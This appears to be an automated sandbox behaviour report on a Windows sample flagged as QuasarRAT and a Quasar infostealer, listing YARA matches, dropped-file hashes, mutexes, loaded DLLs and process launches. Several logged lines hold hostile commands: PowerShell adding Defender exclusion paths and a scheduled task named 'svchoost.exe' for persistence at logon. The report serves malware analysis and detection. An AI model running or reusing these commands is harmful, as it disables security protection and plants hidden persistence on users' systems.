Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E7682350	0_2_00007FF7E7682350
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E76941E8	0_2_00007FF7E76941E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E7693058	0_2_00007FF7E7693058
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E7698838	0_2_00007FF7E7698838
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E76A00E8	0_2_00007FF7E76A00E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E76A9718	0_2_00007FF7E76A9718
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E7692810	0_2_00007FF7E7692810
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E76A3798	0_2_00007FF7E76A3798
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E769E690	0_2_00007FF7E769E690
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E769CE44	0_2_00007FF7E769CE44
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E76AA62C	0_2_00007FF7E76AA62C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E7693564	0_2_00007FF7E7693564
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E769260C	0_2_00007FF7E769260C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E76A54F8	0_2_00007FF7E76A54F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E769D4C4	0_2_00007FF7E769D4C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E7695B58	0_2_00007FF7E7695B58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E76A2328	0_2_00007FF7E76A2328
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E76A8260	0_2_00007FF7E76A8260
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E7699B00	0_2_00007FF7E7699B00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E769612C	0_2_00007FF7E769612C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E7692A14	0_2_00007FF7E7692A14
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E76A6A08	0_2_00007FF7E76A6A08
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E7696A00	0_2_00007FF7E7696A00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E769C9B0	0_2_00007FF7E769C9B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFD9BB82E11	17_2_00007FFD9BB82E11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFD9BBA30B2	21_2_00007FFD9BBA30B2
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BD27C16	27_2_00007FFD9BD27C16
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BD2EB29	27_2_00007FFD9BD2EB29
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BD33AF9	27_2_00007FFD9BD33AF9
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BD2CAD5	27_2_00007FFD9BD2CAD5
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BD19271	27_2_00007FFD9BD19271
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BD39230	27_2_00007FFD9BD39230
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BD28A0F	27_2_00007FFD9BD28A0F
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BD2B851	27_2_00007FFD9BD2B851
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BD1AFDD	27_2_00007FFD9BD1AFDD
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BD19FD0	27_2_00007FFD9BD19FD0
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BD2FE80	27_2_00007FFD9BD2FE80
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BD155D6	27_2_00007FFD9BD155D6
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BD1621F	27_2_00007FFD9BD1621F
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BE32321	27_2_00007FFD9BE32321

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe 0502A8DA4A9F46A7375766B83D181AA9F38E9969B10801F80736A3598410A281
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\SubDir\Client.exe 0502A8DA4A9F46A7375766B83D181AA9F38E9969B10801F80736A3598410A281
Source: Joe Sandbox View	Dropped File: C:\WCTVN\mmytljldrgl.exe 0502A8DA4A9F46A7375766B83D181AA9F38E9969B10801F80736A3598410A281

Source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPED	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: C:\WCTVN\mmytljldrgl.exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\WCTVN\mmytljldrgl.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: C:\WCTVN\mmytljldrgl.exe, type: DROPPED	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@49/15@3/4

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4464:120:WilError_03
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\cf3988ab-2fd9-4544-a16f-9faa71eb5bac
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulrrcajd.o5d.ps1

Jump to behavior

Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	ReversingLabs: Detection: 21%
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Virustotal: Detection: 26%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\WCTVN\mmytljldrgl.exe "C:\WCTVN\mmytljldrgl.exe"
Source: C:\WCTVN\mmytljldrgl.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\WCTVN\mmytljldrgl.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\Client.exe "C:\Users\user\AppData\Roaming\SubDir\Client.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SubDir\Client.exe C:\Users\user\AppData\Roaming\SubDir\Client.exe
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process created: C:\WCTVN\mmytljldrgl.exe "C:\WCTVN\mmytljldrgl.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\Client.exe "C:\Users\user\AppData\Roaming\SubDir\Client.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
